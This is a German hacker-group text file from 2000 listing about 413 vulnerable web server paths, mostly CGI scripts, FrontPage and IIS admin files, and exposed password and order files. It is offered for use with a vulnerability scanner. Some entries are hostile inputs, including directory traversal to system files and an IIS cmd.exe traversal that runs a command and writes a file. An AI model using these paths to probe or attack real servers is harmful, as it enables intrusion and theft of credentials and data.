kleine liste der cgi's
Created by : SwiDch
Homepage : http://www.h-d-c.org
E-Mail : SwiDch@h-d-c.org or SwiDch@gmx.de
IRC-Net : irc.uni-erlangen.de:6667 #hdc-public
Date : 09.12.2000
Version : 1.0
cgi's : 413
hackers digital crime
-----------------------------------------------------------------------------
1. Disclaimer
2. Verwendung
3. cgi Liste
4. Greets
1. Disclaimer
ihr duerft den text veroeffentlichen, kopieren, jedoch nicht veraendern. ich
wuerde mich freuen, wenn ihr mir vor der veroeffentlichung eine mail zukommen
lassen wuerdet. falls ihr fehler findet, informiert mich bitte per mail.
diese datenbank ist nur zu informationszwecken zusammengestellt worden und
nicht um leute zu schaedigen. wenn ihr dies dennoch tut, uebernehme ich keine
verantwortung und bin auch nicht haftbar zu machen.
2. Verwendung
hier eine kleine liste mit verschiedenen cgi's. verwendet sie mit einem
sanner oda macht damit was ihr wollt. zu manchen cgi's finden sich auch
exploits; manche sind auch in der exploit liste von zahr^hdc
(zahar@h-d-c.org) enthalten, wenn nicht setzte ich einschlaegige seiten als
grundwissen voraus. falls ihr updates habt oder finden solltet, teilt sie mir
bitte mit.
3. cgi Liste
../..
../../boot.ini
/......../
/....../autoexec.bat
/../../config.sys
/.html/............../config.sys
/?PageServices
/_AuthChangeUrl?
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_vti_bin/
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.pwd
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/~root
/admcgi/contents.htm
/admin.php3
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/fpadmin.htm
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/Album/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/aux
/bb-dnbd/bb-hist.sh
/carbo.dll
/catalog.nsf
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi-bin/
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/.fhp
/cgi-bin/add_ftp.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/AnForm2
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm2
/cgi-bin/apexec.pl
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/axs.cgi
/cgi-bin/bb-hist.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/c_download.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiback.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds.cgi
/cgi-bin/Count.cgi
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/displayTC.pl
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/enter.cgi
/cgi-bin/environ.cgi
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger?@localhost
/cgi-bin/flexform.cgi
/cgi-bin/form.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/formmail.pl
/cgi-bin/fpexplore.exe
/cgi-bin/get32.exe
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgi-bin/htgrep
/cgi-bin/htmldocs
/cgi-bin/htmlscript
/cgi-bin/icat
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/jj
/cgi-bin/login.cgi
/cgi-bin/logs
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/MachineInfo
/cgi-bin/maillist.cgi
/cgi-bin/maillist.pl
/cgi-bin/man.sh
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/minimal.exe
/cgi-bin/mlog.phtml
/cgi-bin/nlog-smb.cgi
/cgi-bin/nph-error.pl
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/ntitar.pl
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/post_query
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/query
/cgi-bin/redir.exe
/cgi-bin/redirect
/cgi-bin/responder.cgi
/cgi-bin/rguest.exe
/cgi-bin/rmp_query
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/sawmill
/cgi-bin/search.cgi
/cgi-bin/search/search.cgi
/cgi-bin/search/tidfinder.cgi
/cgi-bin/sendform.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn.cgi
/cgi-bin/spin_client.cgi
/cgi-bin/stats.prg
/cgi-bin/statsconfig
/cgi-bin/survey.cgi
/cgi-bin/tablebuild.pl
/cgi-bin/test.bat
/cgi-bin/test-cgi
/cgi-bin/testcgi.exe
/cgi-bin/test-cgi.tcl
/cgi-bin/textcounter.pl
/cgi-bin/tigvote.cgi
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/ultraboard.cgi
/cgi-bin/ultraboard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload.pl
/cgi-bin/view-source
/cgi-bin/visitor.exe
/cgi-bin/w2-msql
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3tvars.pm
/cgi-bin/wais.pl
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webgais
/cgi-bin/webmap.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/Web_store/web_store.cgi
/cgi-bin/webutils.pl
/cgi-bin/webwho.pl
/cgi-bin/htsearch
/cgi-bin/wguest.exe
/cgi-bin/whois.cgi
/cgi-bin/whois_raw.cgi
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/YaBB.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-shl/win-c-sample.exe
/cgi-win/uploader.exe
/cgi-win/wwwuploader.exe
/code.php3
/com1
/com2
/com3
/con
/con/con
/config/check.txt
/config/import.txt
/config/mountain.cfg
/database.nsf/
/DataBase/
/default.asp
/doc
/domcfg.nsf
/domcfg.nsf/?open
/domlog.nsf
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/getdrvrs.exe
/GetFile.cfm
/html/?PageServices
/iisadmin
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/iissamples/query.asp
/iissamples/sdk/asp/docs/codebrws.asp
/index.asp::$DATA
/log
/log.nsf
/lpt
/main.asp%81
/manage/cgi/cgiproc
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/Samples/SELECTOR/showcode.asp
/msads/Samples/SELECTOR/showcode.asp
/names.nsf
/ncl_items.html
/neowebscript/test/senvironment.nhtml
/neowebscript/tests/load_webenv.nhtml
/neowebscript/tests/mailtest.nhtml
/officescan/cgi/jdkRqNotify.exe
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/perl/files.pl
/phpPhotoAlbum/getalbum.php
/piranha/secure/passwd.php3
/products/phpPhotoAlbum/explorer.php
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/reviews/newpro.cgi
/samples/isapi/srch.htm
/samples/search/queryhit.htm
/samples/search/webhits.exe
/sawmill
/scripts/
/scripts/../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat
/scripts/c32web.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/CGImail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/issadmin/bdir.htr
/scripts/perl.exe
/scripts/perl?
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postinfo.asp
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/repost.asp
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/webbbs.exe
/search
/search97.vts
/secure/.htaccess
/secure/.wwwacl
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/admnlogin
/srchadm
/ss.cfg
/ssi/envout.bat
/stats
/status
/status.cgi
/test/test.cgi
/today.nsf
/tools/newdsn.exe
/users/scripts/submit.cgi
/webcart/
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/WebSTART%20LOG
/xxxxxxx.....xxxxxxxxx/
4. Greets fly out
HDC, TFH, digreb, telcoswitch, alle aus #digreb Y2K, cray, penne, duden,
servie, wisskie, M_o0o_Z, ratman, cateyes, acid, mop Ernesto Tequilla,
LordMeixi, Strange, neo|19|, B|ondie die heute 18 wurde. :) ThePager,
Tschagga, chb (momentan snicker), Rubd|n|, deepblue, koma, e-shock und alle
die mich sonst noch so kennen und ich vergessen habe.
EOF